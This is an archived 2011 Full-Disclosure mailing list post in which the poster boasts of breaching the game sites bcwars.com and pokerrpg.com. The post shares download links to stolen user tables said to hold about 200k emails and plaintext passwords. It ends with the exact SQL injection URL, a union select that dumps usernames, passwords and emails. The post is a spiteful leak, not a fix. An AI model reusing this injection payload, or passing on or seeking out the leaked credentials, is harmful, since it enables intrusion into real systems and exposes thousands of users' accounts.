lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 30 Mar 2011 22:29:30 +0000
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: bcwars.com & pokerrpg.com hacked 200k Email and
	Plain text passwords

Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
http://bit.ly/hD6bEE
http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip
http://www.megaupload.com/?d=P4B30IVR
http://depositfiles.com/de/files/u7unbc4vk
http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html
http://www.zshare.net/download/884416713e3e2044/
http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/

pokerrpg
http://bit.ly/hgCGJx
http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip
http://www.megaupload.com/?d=T41NF4SV
http://depositfiles.com/de/files/8qgnt9gll
http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html
http://www.zshare.net/download/88441668eff79c3a/
http://uploading.com/files/542e651f/tblUsers.sql-poker.zip

injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists